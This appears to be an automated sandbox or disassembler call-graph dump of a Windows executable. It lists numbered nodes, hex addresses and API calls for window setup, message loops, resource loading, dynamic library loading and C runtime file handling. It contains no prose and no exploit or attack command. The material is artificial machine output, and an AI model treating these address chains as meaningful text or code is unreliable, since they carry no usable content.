94951->94952 94954 750fa7 _W_store_winword 59 API calls 94952->94954 94956 7a1c38 94953->94956 94955 736309 94954->94955 94955->94956 94957 736313 94955->94957 94959 735374 50 API calls 94956->94959 94958 750fa7 _W_store_winword 59 API calls 94957->94958 94960 73631e 94958->94960 94961 7a1c5d 94959->94961 94962 73635f 94960->94962 94964 7a1c86 94960->94964 94968 7363fc 48 API calls 94960->94968 94963 7363fc 48 API calls 94961->94963 94962->94964 94965 73636c 94962->94965 94966 7a1c69 94963->94966 94969 736eed 48 API calls 94964->94969 94973 74c050 48 API calls 94965->94973 94967 736eed 48 API calls 94966->94967 94970 7a1c77 94967->94970 94971 736342 94968->94971 94972 7a1ca8 94969->94972 94974 7363fc 48 API calls 94970->94974 94975 736eed 48 API calls 94971->94975 94976 7363fc 48 API calls 94972->94976 94977 736384 94973->94977 94974->94964 94979 736350 94975->94979 94980 7a1cb5 94976->94980 94978 741b90 48 API calls 94977->94978 94984 736394 94978->94984 94981 7363fc 48 API calls 94979->94981 94980->94980 94981->94962 94982 741b90 48 API calls 94982->94984 94984->94982 94985 7363fc 48 API calls 94984->94985 94986 7363d6 Mailbox 94984->94986 95149 736b68 48 API calls 94984->95149 94985->94984 94986->94863 94988 7340f2 __ftell_nolock 94987->94988 94989 7a370e _memset 94988->94989 94990 73410b 94988->94990 94993 7a372a GetOpenFileNameW 94989->94993 94991 73660f 49 API calls 94990->94991 94992 734114 94991->94992 95624 7340a7 94992->95624 94995 7a3779 94993->94995 94996 736a63 48 API calls 94995->94996 94998 7a378e 94996->94998 94998->94998 95000 734129 95642 734139 95000->95642 95004 73643d __ftell_nolock 95003->95004 95842 734c75 95004->95842 95006 736442 95007 733dee 95006->95007 95853 735928 86 API calls 95006->95853 95007->94873 95007->94881 95009 73644f 95009->95007 95854 735798 88 API calls Mailbox 95009->95854 95011 736458 95011->95007 95012 73645c GetFullPathNameW 95011->95012 95013 736a63 48 API calls 95012->95013 95014 736488 95013->95014 95015 736a63 48 API calls 95014->95015 95016 736495 95015->95016 95017 7a5dcf _wcscat 95016->95017 95018 736a63 48 API calls 95016->95018 95018->95007 95020 7a1cba 95019->95020 95021 733ed8 95019->95021 95859 734024 95021->95859 95025 733e05 95026 7336b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95025->95026 95026->94889 95028 73e8f6 95027->95028 95087 73e906 Mailbox 95027->95087 95030 73ed52 95028->95030 95028->95087 95029 77cc5c 86 API calls 95029->95087 96026 74e3cd 346 API calls 95030->96026 95031 73ebc7 95033 733e2a 95031->95033 96027 732ff6 16 API calls 95031->96027 95033->94866 95088 733847 Shell_NotifyIconW _memset 95033->95088 95035 73ed63 95035->95033 95036 73ed70 95035->95036 96028 74e312 346 API calls Mailbox 95036->96028 95037 73e94c PeekMessageW 95037->95087 95039 7a526e Sleep 95039->95087 95040 73ed77 LockWindowUpdate DestroyWindow GetMessageW 95040->95033 95042 73eda9 95040->95042 95043 7a59ef TranslateMessage DispatchMessageW GetMessageW 95042->95043 95043->95043 95045 7a5a1f 95043->95045 95045->95033 95046 73ed21 PeekMessageW 95046->95087 95047 73ebf7 timeGetTime 95047->95087 95049 74f4ea 48 API calls 95049->95087 95050 736eed 48 API calls 95050->95087 95051 7a5557 WaitForSingleObject 95054 7a5574 GetExitCodeProcess CloseHandle 95051->95054 95051->95087 95052 73ed3a TranslateMessage DispatchMessageW 95052->95046 95053 7a588f Sleep 95083 7a5429 Mailbox 95053->95083 95054->95087 95055 73d7f7 48 API calls 95055->95083 95056 73edae timeGetTime 96029 731caa 49 API calls 95056->96029 95057 7a5733 Sleep 95057->95083 95058 74dc38 timeGetTime 95058->95083 95062 7a5926 GetExitCodeProcess 95065 7a593c WaitForSingleObject 95062->95065 95066 7a5952 CloseHandle 95062->95066 95064 732aae 322 API calls 95064->95087 95065->95066 95065->95087 95066->95083 95067 7a5445 Sleep 95067->95087 95069 732c79 107 API calls 95069->95083 95070 7a5432 Sleep 95070->95067 95071 798c4b 108 API calls 95071->95083 95072 7a59ae Sleep 95072->95087 95073 731caa 49 API calls 95073->95087 95074 73ce19 48 API calls 95074->95083 95078 73d6e9 55 API calls 95078->95083 95079 73fe30 322 API calls 95079->95087 95083->95055 95083->95058 95083->95062 95083->95067 95083->95069 95083->95070 95083->95071 95083->95072 95083->95074 95083->95078 95083->95087 96031 774cbe 49 API calls Mailbox 95083->96031 96032 731caa 49 API calls 95083->96032 96033 732aae 346 API calls 95083->96033 96034 78ccb2 50 API calls 95083->96034 96035 777a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95083->96035 96036 776532 63 API calls 3 library calls 95083->96036 95084 73ce19 48 API calls 95084->95087 95086 73d6e9 55 API calls 95086->95087 95087->95029 95087->95031 95087->95037 95087->95039 95087->95046 95087->95047 95087->95049 95087->95050 95087->95051 95087->95052 95087->95053 95087->95056 95087->95057 95087->95064 95087->95067 95087->95073 95087->95079 95087->95083 95087->95084 95087->95086 95864 73ef00 95087->95864 95869 73f110 95087->95869 95934 7445e0 95087->95934 95951 73eed0 346 API calls Mailbox 95087->95951 95952 743200 95087->95952 96024 74e244 TranslateAcceleratorW 95087->96024 96025 74dc5f IsDialogMessageW GetClassLongW 95087->96025 96030 798d23 48 API calls 95087->96030 95088->94866 95089->94873 95090->94886 95092 73d7f7 48 API calls 95091->95092 95093 7361db 95092->95093 95094 736009 95093->95094 95095 736016 __ftell_nolock 95094->95095 95096 736a63 48 API calls 95095->95096 95101 73617c Mailbox 95095->95101 95098 736048 95096->95098 95107 73607e Mailbox 95098->95107 95150 7361a6 95098->95150 95099 7361a6 48 API calls 95099->95107 95100 73614f 95100->95101 95102 73ce19 48 API calls 95100->95102 95101->94917 95104 736170 95102->95104 95103 73ce19 48 API calls 95103->95107 95105 7364cf 48 API calls 95104->95105 95105->95101 95106 7364cf 48 API calls 95106->95107 95107->95099 95107->95100 95107->95101 95107->95103 95107->95106 95153 7341a9 95108->95153 95111 733a06 95111->94923 95114 7a2ff0 95116 751c9d _free 47 API calls 95114->95116 95117 7a2ffd 95116->95117 95118 734252 84 API calls 95117->95118 95119 7a3006 95118->95119 95119->95119 95121 74f4ea 48 API calls 95120->95121 95122 736237 95121->95122 95122->94928 95124 73d654 95123->95124 95132 73d67e 95123->95132 95125 73d65b 95124->95125 95128 73d6c2 95124->95128 95126 73d6ab 95125->95126 95127 73d666 95125->95127 95126->95132 95619 74dce0 53 API calls 95126->95619 95130 73d9a0 53 API calls 95127->95130 95128->95126 95620 74dce0 53 API calls 95128->95620 95130->95132 95132->94939 95134 736406 95133->95134 95135 73641f 95133->95135 95136 736eed 48 API calls 95134->95136 95137 736a63 48 API calls 95135->95137 95138 7362d1 95136->95138 95137->95138 95139 750fa7 95138->95139 95140 750fb3 95139->95140 95141 751028 95139->95141 95148 750fd8 95140->95148 95621 757c0e 47 API calls __getptd_noexit 95140->95621 95623 75103a 59 API calls 3 library calls 95141->95623 95144 751035 95144->94945 95145 750fbf 95622 756e10 8 API calls __wcsicmp_l 95145->95622 95147 750fca 95147->94945 95148->94945 95149->94984 95151 73bdfa 48 API calls 95150->95151 95152 7361b1 95151->95152 95152->95098 95218 734214 95153->95218 95158 7341d4 LoadLibraryExW 95228 734291 95158->95228 95159 7a4f73 95161 734252 84 API calls 95159->95161 95163 7a4f7a 95161->95163 95165 734291 3 API calls 95163->95165 95167 7a4f82 95165->95167 95166 7341fb 95166->95167 95168 734207 95166->95168 95254 7344ed 95167->95254 95170 734252 84 API calls 95168->95170 95172 7339fe 95170->95172 95172->95111 95177 77c396 95172->95177 95174 7a4fa9 95262 734950 95174->95262 95176 7a4fb6 95178 734517 83 API calls 95177->95178 95179 77c405 95178->95179 95439 77c56d 95179->95439 95182 7344ed 64 API calls 95183 77c432 95182->95183 95184 7344ed 64 API calls 95183->95184 95185 77c442 95184->95185 95186 7344ed 64 API calls 95185->95186 95187 77c45d 95186->95187 95188 7344ed 64 API calls 95187->95188 95189 77c478 95188->95189 95190 734517 83 API calls 95189->95190 95191 77c48f 95190->95191 95192 75395c __crtGetStringTypeA_stat 47 API calls 95191->95192 95193 77c496 95192->95193 95194 75395c __crtGetStringTypeA_stat 47 API calls 95193->95194 95195 77c4a0 95194->95195 95196 7344ed 64 API calls 95195->95196 95197 77c4b4 95196->95197 95198 77bf5a GetSystemTimeAsFileTime 95197->95198 95199 77c4c7 95198->95199 95200 77c4f1 95199->95200 95201 77c4dc 95199->95201 95203 77c4f7 95200->95203 95204 77c556 95200->95204 95202 751c9d _free 47 API calls 95201->95202 95205 77c4e2 95202->95205 95445 77b965 95203->95445 95207 751c9d _free 47 API calls 95204->95207 95208 751c9d _free 47 API calls 95205->95208 95210 77c41b 95207->95210 95208->95210 95210->95114 95212 734252 95210->95212 95211 751c9d _free 47 API calls 95211->95210 95213 73425c 95212->95213 95215 734263 95212->95215 95214 7535e4 __fcloseall 83 API calls 95213->95214 95214->95215 95216 734283 FreeLibrary 95215->95216 95217 734272 95215->95217 95216->95217 95217->95114 95267 734339 95218->95267 95221 73423c 95222 734244 FreeLibrary 95221->95222 95223 7341bb 95221->95223 95222->95223 95225 753499 95223->95225 95275 7534ae 95225->95275 95227 7341c8 95227->95158 95227->95159 95353 7342e4 95228->95353 95231 7342b8 95233 7342c1 FreeLibrary 95231->95233 95234 7341ec 95231->95234 95233->95234 95235 734380 95234->95235 95236 74f4ea 48 API calls 95235->95236 95237 734395 95236->95237 95238 7347b7 48 API calls 95237->95238 95239 7343a1 _memcpy_s 95238->95239 95240 7343dc 95239->95240 95241 7344d1 95239->95241 95242 734499 95239->95242 95243 734950 57 API calls 95240->95243 95372 77c750 93 API calls 95241->95372 95361 73406b CreateStreamOnHGlobal 95242->95361 95249 7343e5 95243->95249 95246 7344ed 64 API calls 95246->95249 95247 734479 95247->95166 95249->95246 95249->95247 95250 7a4ed7 95249->95250 95367 734517 95249->95367 95251 734517 83 API calls 95250->95251 95252 7a4eeb 95251->95252 95253 7344ed 64 API calls 95252->95253 95253->95247 95255 7a4fc0 95254->95255 95256 7344ff 95254->95256 95396 75381e 95256->95396 95259 77bf5a 95416 77bdb4 95259->95416 95261 77bf70 95261->95174 95263 73495f 95262->95263 95266 7a5002 95262->95266 95421 753e65 95263->95421 95265 734967 95265->95176 95271 73434b 95267->95271 95270 734321 LoadLibraryA GetProcAddress 95270->95221 95272 73422f 95271->95272 95273 734354 LoadLibraryA 95271->95273 95272->95221 95272->95270 95273->95272 95274 734365 GetProcAddress 95273->95274 95274->95272 95276 7534ba __tzset_nolock 95275->95276 95277 7534cd 95276->95277 95279 7534fe 95276->95279 95323 757c0e 47 API calls __getptd_noexit 95277->95323 95294 75e4c8 95279->95294 95280 7534d2 95324 756e10 8 API calls __wcsicmp_l 95280->95324 95283 753503 95284 75350c 95283->95284 95285 753519 95283->95285 95325 757c0e 47 API calls __getptd_noexit 95284->95325 95287 753543 95285->95287 95288 753523 95285->95288 95308 75e5e0 95287->95308 95326 757c0e 47 API calls __getptd_noexit 95288->95326 95289 7534dd __tzset_nolock @_EH4_CallFilterFunc@8 95289->95227 95295 75e4d4 __tzset_nolock 95294->95295 95296 757cf4 __lock 47 API calls 95295->95296 95306 75e4e2 95296->95306 95297 75e552 95328 75e5d7 95297->95328 95298 75e559 95299 7569d0 __malloc_crt 47 API calls 95298->95299 95301 75e560 95299->95301 95301->95297 95303 75e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 95301->95303 95302 75e5cc __tzset_nolock 95302->95283 95303->95297 95304 757d7c __mtinitlocknum 47 API calls 95304->95306 95306->95297 95306->95298 95306->95304 95331 754e5b 48 API calls __lock 95306->95331 95332 754ec5 LeaveCriticalSection LeaveCriticalSection _doexit 95306->95332 95317 75e600 __wopenfile 95308->95317 95309 75e61a 95337 757c0e 47 API calls __getptd_noexit 95309->95337 95311 75e7d5 95311->95309 95315 75e838 95311->95315 95312 75e61f 95338 756e10 8 API calls __wcsicmp_l 95312->95338 95314 75354e 95327 753570 LeaveCriticalSection LeaveCriticalSection _fprintf 95314->95327 95334 7663c9 95315->95334 95317->95309 95317->95311 95317->95317 95339 75185b 59 API calls 2 library calls 95317->95339 95319 75e7ce 95319->95311 95340 75185b 59 API calls 2 library calls 95319->95340 95321 75e7ed 95321->95311 95341 75185b 59 API calls 2 library calls 95321->95341 95323->95280 95324->95289 95325->95289 95326->95289 95327->95289 95333 757e58 LeaveCriticalSection 95328->95333 95330 75e5de 95330->95302 95331->95306 95332->95306 95333->95330 95342 765bb1 95334->95342 95336 7663e2 95336->95314 95337->95312 95338->95314 95339->95319 95340->95321 95341->95311 95343 765bbd __tzset_nolock 95342->95343 95344 765bcf 95343->95344 95347 765c06 95343->95347 95345 757c0e __wcsicmp_l 47 API calls 95344->95345 95346 765bd4 95345->95346 95349 756e10 __wcsicmp_l 8 API calls 95346->95349 95348 765c78 __wsopen_helper 110 API calls 95347->95348 95350 765c23 95348->95350 95352 765bde __tzset_nolock 95349->95352 95351 765c4c __wsopen_helper LeaveCriticalSection 95350->95351 95351->95352 95352->95336 95357 7342f6 95353->95357 95356 7342cc LoadLibraryA GetProcAddress 95356->95231 95358 7342aa 95357->95358 95359 7342ff LoadLibraryA 95357->95359 95358->95231 95358->95356 95359->95358 95360 734310 GetProcAddress 95359->95360 95360->95358 95362 734085 FindResourceExW 95361->95362 95363 7340a2 95361->95363 95362->95363 95364 7a4f16 LoadResource 95362->95364 95363->95240 95364->95363 95365 7a4f2b SizeofResource 95364->95365 95365->95363 95366 7a4f3f LockResource 95365->95366 95366->95363 95368 734526 95367->95368 95369 7a4fe0 95367->95369 95373 753a8d 95368->95373 95371 734534 95371->95249 95372->95240 95376 753a99 __tzset_nolock 95373->95376 95374 753aa7 95386 757c0e 47 API calls __getptd_noexit 95374->95386 95376->95374 95377 753acd 95376->95377 95388 754e1c 95377->95388 95378 753aac 95387 756e10 8 API calls __wcsicmp_l 95378->95387 95381 753ad3 95394 7539fe 81 API calls 5 library calls 95381->95394 95383 753ae2 95395 753b04 LeaveCriticalSection LeaveCriticalSection _fprintf 95383->95395 95385 753ab7 __tzset_nolock 95385->95371 95386->95378 95387->95385 95389 754e2c 95388->95389 95390 754e4e EnterCriticalSection 95388->95390 95389->95390 95391 754e34 95389->95391 95393 754e44 95390->95393 95392 757cf4 __lock 47 API calls 95391->95392 95392->95393 95393->95381 95394->95383 95395->95385 95399 753839 95396->95399 95398 734510 95398->95259 95400 753845 __tzset_nolock 95399->95400 95401 753888 95400->95401 95402 75385b _memset 95400->95402 95403 753880 __tzset_nolock 95400->95403 95404 754e1c __lock_file 48 API calls 95401->95404 95412 757c0e 47 API calls __getptd_noexit 95402->95412 95403->95398 95406 75388e 95404->95406 95414 75365b 62 API calls 5 library calls 95406->95414 95407 753875 95413 756e10 8 API calls __wcsicmp_l 95407->95413 95410 7538a4 95415 7538c2 LeaveCriticalSection LeaveCriticalSection _fprintf 95410->95415 95412->95407 95413->95403 95414->95410 95415->95403 95419 75344a GetSystemTimeAsFileTime 95416->95419 95418 77bdc3 95418->95261 95420 753478 __aulldiv 95419->95420 95420->95418 95422 753e71 __tzset_nolock 95421->95422 95423 753e94 95422->95423 95424 753e7f 95422->95424 95425 754e1c __lock_file 48 API calls 95423->95425 95435 757c0e 47 API calls __getptd_noexit 95424->95435 95428 753e9a 95425->95428 95427 753e84 95436 756e10 8 API calls __wcsicmp_l 95427->95436 95437 753b0c 55 API calls 6 library calls 95428->95437 95431 753e8f __tzset_nolock 95431->95265 95432 753ea5 95438 753ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 95432->95438 95434 753eb7 95434->95431 95435->95427 95436->95431 95437->95432 95438->95434 95443 77c581 __tzset_nolock _wcscmp 95439->95443 95440 77c417 95440->95182 95440->95210 95441 7344ed 64 API calls 95441->95443 95442 77bf5a GetSystemTimeAsFileTime 95442->95443 95443->95440 95443->95441 95443->95442 95444 734517 83 API calls 95443->95444 95444->95443 95446 77b970 95445->95446 95447 77b97e 95445->95447 95448 753499 117 API calls 95446->95448 95449 77b9c3 95447->95449 95450 753499 117 API calls 95447->95450 95472 77b987 95447->95472 95448->95447 95476 77bbe8 64 API calls 3 library calls 95449->95476 95452 77b9a8 95450->95452 95452->95449 95454 77b9b1 95452->95454 95453 77ba07 95455 77ba2c 95453->95455 95456 77ba0b 95453->95456 95454->95472 95487 7535e4 95454->95487 95477 77b7e5 47 API calls __crtGetStringTypeA_stat 95455->95477 95459 77ba18 95456->95459 95461 7535e4 __fcloseall 83 API calls 95456->95461 95464 7535e4 __fcloseall 83 API calls 95459->95464 95459->95472 95460 77ba34 95462 77ba5a 95460->95462 95463 77ba3a 95460->95463 95461->95459 95478 77ba8a 90 API calls 95462->95478 95465 77ba47 95463->95465 95467 7535e4 __fcloseall 83 API calls 95463->95467 95464->95472 95470 7535e4 __fcloseall 83 API calls 95465->95470 95465->95472 95467->95465 95468 77ba61 95479 77bb64 95468->95479 95470->95472 95472->95211 95473 77ba75 95473->95472 95475 7535e4 __fcloseall 83 API calls 95473->95475 95474 7535e4 __fcloseall 83 API calls 95474->95473 95475->95472 95476->95453 95477->95460 95478->95468 95480 77bb71 95479->95480 95481 77bb77 95479->95481 95483 751c9d _free 47 API calls 95480->95483 95482 77bb88 95481->95482 95484 751c9d _free 47 API calls 95481->95484 95485 77ba68 95482->95485 95486 751c9d _free 47 API calls 95482->95486 95483->95481 95484->95482 95485->95473 95485->95474 95486->95485 95488 7535f0 __tzset_nolock 95487->95488 95489 753604 95488->95489 95490 75361c 95488->95490 95516 757c0e 47 API calls __getptd_noexit 95489->95516 95492 754e1c __lock_file 48 API calls 95490->95492 95497 753614 __tzset_nolock 95490->95497 95494 75362e 95492->95494 95493 753609 95517 756e10 8 API calls __wcsicmp_l 95493->95517 95500 753578 95494->95500 95497->95472 95501 753587 95500->95501 95502 75359b 95500->95502 95559 757c0e 47 API calls __getptd_noexit 95501->95559 95514 753597 95502->95514 95519 752c84 95502->95519 95504 75358c 95560 756e10 8 API calls __wcsicmp_l 95504->95560 95511 7535b5 95536 75e9d2 95511->95536 95513 7535bb 95513->95514 95515 751c9d _free 47 API calls 95513->95515 95518 753653 LeaveCriticalSection LeaveCriticalSection _fprintf 95514->95518 95515->95514 95516->95493 95517->95497 95518->95497 95520 752c97 95519->95520 95524 752cbb 95519->95524 95521 752933 __filbuf 47 API calls 95520->95521 95520->95524 95522 752cb4 95521->95522 95561 75af61 95522->95561 95525 75eb36 95524->95525 95526 7535af 95525->95526 95527 75eb43 95525->95527 95529 752933 95526->95529 95527->95526 95528 751c9d _free 47 API calls 95527->95528 95528->95526 95530 752952 95529->95530 95531 75293d 95529->95531 95530->95511 95586 757c0e 47 API calls __getptd_noexit 95531->95586 95533 752942 95587 756e10 8 API calls __wcsicmp_l 95533->95587 95535 75294d 95535->95511 95537 75e9de __tzset_nolock 95536->95537 95538 75e9e6 95537->95538 95539 75e9fe 95537->95539 95612 757bda 47 API calls __getptd_noexit 95538->95612 95541 75ea7b 95539->95541 95544 75ea28 95539->95544 95616 757bda 47 API calls __getptd_noexit 95541->95616 95542 75e9eb 95613 757c0e 47 API calls __getptd_noexit 95542->95613 95588 75a8ed 95544->95588 95546 75ea80 95617 757c0e 47 API calls __getptd_noexit 95546->95617 95548 75e9f3 __tzset_nolock 95548->95513 95550 75ea88 95618 756e10 8 API calls __wcsicmp_l 95550->95618 95551 75ea2e 95553 75ea41 95551->95553 95554 75ea4c 95551->95554 95597 75ea9c 95553->95597 95614 757c0e 47 API calls __getptd_noexit 95554->95614 95557 75ea47 95615 75ea73 LeaveCriticalSection __unlock_fhandle 95557->95615 95559->95504 95560->95514 95562 75af6d __tzset_nolock 95561->95562 95563 75af75 95562->95563 95564 75af8d 95562->95564 95566 757bda __lseeki64 47 API calls 95563->95566 95565 75b022 95564->95565 95570 75afbf 95564->95570 95568 757bda __lseeki64 47 API calls 95565->95568 95567 75af7a 95566->95567 95569 757c0e __wcsicmp_l 47 API calls 95567->95569 95571 75b027 95568->95571 95579 75af82 __tzset_nolock 95569->95579 95572 75a8ed ___lock_fhandle 49 API calls 95570->95572 95573 757c0e __wcsicmp_l 47 API calls 95571->95573 95574 75afc5 95572->95574 95575 75b02f 95573->95575 95576 75afd8 95574->95576 95577 75afeb 95574->95577 95578 756e10 __wcsicmp_l 8 API calls 95575->95578 95580 75b043 __chsize_nolock 75 API calls 95576->95580 95581 757c0e __wcsicmp_l 47 API calls 95577->95581 95578->95579 95579->95524 95582 75afe4 95580->95582 95583 75aff0 95581->95583 95585 75b01a __flush LeaveCriticalSection 95582->95585 95584 757bda __lseeki64 47 API calls 95583->95584 95584->95582 95585->95579 95586->95533 95587->95535 95589 75a8f9 __tzset_nolock 95588->95589 95590 75a946 EnterCriticalSection 95589->95590 95592 757cf4 __lock 47 API calls 95589->95592 95591 75a96c __tzset_nolock 95590->95591 95591->95551 95593 75a91d 95592->95593 95594 75a928 InitializeCriticalSectionAndSpinCount 95593->95594 95595 75a93a 95593->95595 95594->95595 95596 75a970 ___lock_fhandle LeaveCriticalSection 95595->95596 95596->95590 95598 75aba4 __close_nolock 47 API calls 95597->95598 95601 75eaaa 95598->95601 95599 75eb00 95600 75ab1e __free_osfhnd 48 API calls 95599->95600 95604 75eb08 95600->95604 95601->95599 95602 75eade 95601->95602 95605 75aba4 __close_nolock 47 API calls 95601->95605 95602->95599 95603 75aba4 __close_nolock 47 API calls 95602->95603 95607 75eaea CloseHandle 95603->95607 95608 75eb2a 95604->95608 95611 757bed __dosmaperr 47 API calls 95604->95611 95606 75ead5 95605->95606 95609 75aba4 __close_nolock 47 API calls 95606->95609 95607->95599 95610 75eaf6 GetLastError 95607->95610 95608->95557 95609->95602 95610->95599 95611->95608 95612->95542 95613->95548 95614->95557 95615->95548 95616->95546 95617->95550 95618->95548 95619->95132 95620->95126 95621->95145 95622->95147 95623->95144 95625 75f8a0 __ftell_nolock 95624->95625 95626 7340b4 GetLongPathNameW 95625->95626 95627 736a63 48 API calls 95626->95627 95628 7340dc 95627->95628 95629 7349a0 95628->95629 95630 73d7f7 48 API calls 95629->95630 95631 7349b2 95630->95631 95632 73660f 49 API calls 95631->95632 95633 7349bd 95632->95633 95634 7349c8 95633->95634 95635 7a2e35 95633->95635 95636 7364cf 48 API calls 95634->95636 95640 7a2e4f 95635->95640 95682 74d35e 60 API calls 95635->95682 95638 7349d4 95636->95638 95676 7328a6 95638->95676 95641 7349e7 Mailbox 95641->95000 95643 7341a9 136 API calls 95642->95643 95644 73415e 95643->95644 95645 7a3489 95644->95645 95646 7341a9 136 API calls 95644->95646 95647 77c396 122 API calls 95645->95647 95648 734172 95646->95648 95649 7a349e 95647->95649 95648->95645 95650 73417a 95648->95650 95651 7a34bf 95649->95651 95652 7a34a2 95649->95652 95654 7a34aa 95650->95654 95655 734186 95650->95655 95653 74f4ea 48 API calls 95651->95653 95656 734252 84 API calls 95652->95656 95675 7a3504 Mailbox 95653->95675 95771 776b49 87 API calls _wprintf 95654->95771 95683 73c833 95655->95683 95656->95654 95659 7a34b8 95659->95651 95661 7a36b4 95662 751c9d _free 47 API calls 95661->95662 95663 7a36bc 95662->95663 95664 734252 84 API calls 95663->95664 95669 7a36c5 95664->95669 95668 751c9d _free 47 API calls 95668->95669 95669->95668 95671 734252 84 API calls 95669->95671 95777 7725b5 86 API calls 4 library calls 95669->95777 95671->95669 95672 73ce19 48 API calls 95672->95675 95675->95661 95675->95669 95675->95672 95772 772551 48 API calls _memcpy_s 95675->95772 95773 772472 60 API calls 2 library calls 95675->95773 95774 779c12 48 API calls 95675->95774 95775 73ba85 48 API calls _memcpy_s 95675->95775 95776 734dd9 48 API calls 95675->95776 95677 7328b8 95676->95677 95681 7328d7 _memcpy_s 95676->95681 95680 74f4ea 48 API calls 95677->95680 95678 74f4ea 48 API calls 95679 7328ee 95678->95679 95679->95641 95680->95681 95681->95678 95682->95635 95684 73c843 __ftell_nolock 95683->95684 95685 73c860 95684->95685 95686 7a3095 95684->95686 95783 7348ba 49 API calls 95685->95783 95802 7725b5 86 API calls 4 library calls 95686->95802 95689 7a30a8 95803 7725b5 86 API calls 4 library calls 95689->95803 95690 73c882 95784 734550 56 API calls 95690->95784 95692 73c897 95692->95689 95694 73c89f 95692->95694 95696 73d7f7 48 API calls 95694->95696 95695 7a30c4 95698 73c90c 95695->95698 95697 73c8ab 95696->95697 95785 74e968 49 API calls __ftell_nolock 95697->95785 95700 73c91a 95698->95700 95701 7a30d7 95698->95701 95788 751dfc 95700->95788 95704 734907 CloseHandle 95701->95704 95702 73c8b7 95705 73d7f7 48 API calls 95702->95705 95706 7a30e3 95704->95706 95707 73c8c3 95705->95707 95708 7341a9 136 API calls 95706->95708 95709 73660f 49 API calls 95707->95709 95711 7a310d 95708->95711 95710 73c8d1 95709->95710 95786 74eb66 SetFilePointerEx ReadFile 95710->95786 95714 7a3136 95711->95714 95718 77c396 122 API calls 95711->95718 95713 73c943 _wcscat _wcscpy 95717 73c96d SetCurrentDirectoryW 95713->95717 95804 7725b5 86 API calls 4 library calls 95714->95804 95715 73c8fd 95787 7346ce SetFilePointerEx SetFilePointerEx 95715->95787 95721 74f4ea 48 API calls 95717->95721 95722 7a3129 95718->95722 95720 7a314d 95755 73cad1 Mailbox 95720->95755 95725 73c988 95721->95725 95723 7a3152 95722->95723 95724 7a3131 95722->95724 95727 734252 84 API calls 95723->95727 95726 734252 84 API calls 95724->95726 95728 7347b7 48 API calls 95725->95728 95726->95714 95729 7a3157 95727->95729 95758 73c993 Mailbox __wsetenvp 95728->95758 95730 74f4ea 48 API calls 95729->95730 95737 7a3194 95730->95737 95731 73ca9d 95798 734907 95731->95798 95735 73caa9 SetCurrentDirectoryW 95735->95755 95736 733d98 95736->94866 95736->94875 95805 73ba85 48 API calls _memcpy_s 95737->95805 95741 7a33ce 95811 779b72 48 API calls 95741->95811 95742 7a3467 95815 7725b5 86 API calls 4 library calls 95742->95815 95746 7a3480 95746->95731 95747 7a33f0 95812 7929e8 48 API calls _memcpy_s 95747->95812 95749 7a33fd 95751 751c9d _free 47 API calls 95749->95751 95750 7a345f 95814 77240b 48 API calls 3 library calls 95750->95814 95751->95755 95753 73ce19 48 API calls 95753->95758 95778 7348dd 95755->95778 95758->95731 95758->95742 95758->95750 95758->95753 95791 73b337 56 API calls _wcscpy 95758->95791 95792 74c258 GetStringTypeW 95758->95792 95793 73cb93 59 API calls __wcsnicmp 95758->95793 95794 73cb5a GetStringTypeW __wsetenvp 95758->95794 95795 7516d0 GetStringTypeW __wtof_l 95758->95795 95796 73cc24 162 API calls 3 library calls 95758->95796 95797 74c682 48 API calls 95758->95797 95759 7a31dd Mailbox 95759->95741 95763 73ce19 48 API calls 95759->95763 95766 7a3420 95759->95766 95806 772551 48 API calls _memcpy_s 95759->95806 95807 772472 60 API calls 2 library calls 95759->95807 95808 779c12 48 API calls 95759->95808 95809 73ba85 48 API calls _memcpy_s 95759->95809 95810 74c682 48 API calls 95759->95810 95763->95759 95813 7725b5 86 API calls 4 library calls 95766->95813 95768 7a3439 95769 751c9d _free 47 API calls 95768->95769 95770 7a344c 95769->95770 95770->95755 95771->95659 95772->95675 95773->95675 95774->95675 95775->95675 95776->95675 95777->95669 95779 734907 CloseHandle 95778->95779 95780 7348e5 Mailbox 95779->95780 95781 734907 CloseHandle 95780->95781 95782 7348fc 95781->95782 95782->95736 95783->95690 95784->95692 95785->95702 95786->95715 95787->95698 95816 751e46 95788->95816 95791->95758 95792->95758 95793->95758 95794->95758 95795->95758 95796->95758 95797->95758 95799 734911 95798->95799 95800 734920 95798->95800 95799->95735 95800->95799 95801 734925 CloseHandle 95800->95801 95801->95799 95802->95689 95803->95695 95804->95720 95805->95759 95806->95759 95807->95759 95808->95759 95809->95759 95810->95759 95811->95747 95812->95749 95813->95768 95814->95742 95815->95746 95817 751e61 95816->95817 95820 751e55 95816->95820 95840 757c0e 47 API calls __getptd_noexit 95817->95840 95819 752019 95822 751e41 95819->95822 95841 756e10 8 API calls __wcsicmp_l 95819->95841 95820->95817 95828 751ed4 95820->95828 95835 759d6b 47 API calls __wcsicmp_l 95820->95835 95822->95713 95824 751fa0 95824->95817 95824->95822 95827 751fb0 95824->95827 95825 751f5f 95825->95817 95826 751f7b 95825->95826 95837 759d6b 47 API calls __wcsicmp_l 95825->95837 95826->95817 95826->95822 95831 751f91 95826->95831 95839 759d6b 47 API calls __wcsicmp_l 95827->95839 95828->95817 95834 751f41 95828->95834 95836 759d6b 47 API calls __wcsicmp_l 95828->95836 95838 759d6b 47 API calls __wcsicmp_l 95831->95838 95834->95824 95834->95825 95835->95828 95836->95834 95837->95826 95838->95822 95839->95822 95840->95819 95841->95822 95843 734d94 95842->95843 95844 734c8b 95842->95844 95843->95006 95844->95843 95845 74f4ea 48 API calls 95844->95845 95846 734cb2 95845->95846 95847 74f4ea 48 API calls 95846->95847 95848 734d22 95847->95848 95848->95843 95855 73b470 91 API calls 2 library calls 95848->95855 95856 734dd9 48 API calls 95848->95856 95857 779af1 48 API calls 95848->95857 95858 73ba85 48 API calls _memcpy_s 95848->95858 95853->95009 95854->95011 95855->95848 95856->95848 95857->95848 95858->95848 95860 7a418d EnumResourceNamesW 95859->95860 95861 73403c LoadImageW 95859->95861 95862 733ee1 RegisterClassExW 95860->95862 95861->95862 95863 733f53 7 API calls 95862->95863 95863->95025 95865 73ef2f 95864->95865 95866 73ef1d 95864->95866 96037 77cc5c 86 API calls 4 library calls 95865->96037 95866->95087 95868 7a86f9 95868->95868 95870 73f130 95869->95870 95873 73fe30 346 API calls 95870->95873 95877 73f199 95870->95877 95871 73f3dd 95875 7a87c8 95871->95875 95884 73f3f2 95871->95884 95917 73f431 